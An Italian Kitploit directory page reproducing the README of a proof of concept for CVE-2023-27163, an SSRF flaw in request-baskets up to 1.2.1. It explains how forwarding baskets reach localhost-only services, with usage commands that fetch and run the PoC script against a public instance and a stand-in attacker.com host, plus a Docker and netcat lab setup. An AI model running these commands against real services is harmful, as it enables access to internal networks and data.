Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-27163 — Prova di concetto per Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1) | Kitploit
Strumenti/GitHubGitHub/entr0pie/cve-2023-27163
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Prova di concetto per Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)

Vedi Repository
3153 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sito web
Condividi

PoC di SSRF su Request-Baskets (CVE-2023-27163)

Questo repository contiene un Proof-of-Concept (PoC) per CVE-2023-27163, una vulnerabilità Server-Side Request Forgery (SSRF) scoperta in request-baskets fino alla versione 1.2.1. Questa vulnerabilità consente agli aggressori di accedere a risorse di rete e informazioni sensibili sfruttando il componente /api/baskets/{name} tramite una richiesta API modificata.

Ringraziamenti a @b33t1e, @chelinboo147 e @houqinsheng (vedi articolo).

Utilizzo

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

Come funziona?

Request-baskets è un'applicazione web progettata per raccogliere e registrare richieste su una route specifica, chiamata basket. Quando la si crea, l'utente può specificare un altro server a cui inoltrare la richiesta. Il problema è che l'utente può specificare servizi non previsti, come applicazioni chiuse in rete.

Ad esempio: supponiamo che il server ospiti Request-baskets (porta 55555) e un server web Flask sulla porta 8000. Flask è anche configurato per interagire solo con localhost. Creando un basket che inoltra a http://localhost:8000, l'attaccante può accedere al server web Flask prima limitato.

Test su localhost

PoC image

  1. Avvia il container Docker di Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Scarica il PoC
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Attendi una connessione
root@kitploit:~
nc -lvp 8000
  1. Salva l'indirizzo IP del docker host
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Esegui il PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Licenza

Questo progetto è sotto Unlicense.

Scarica lo strumento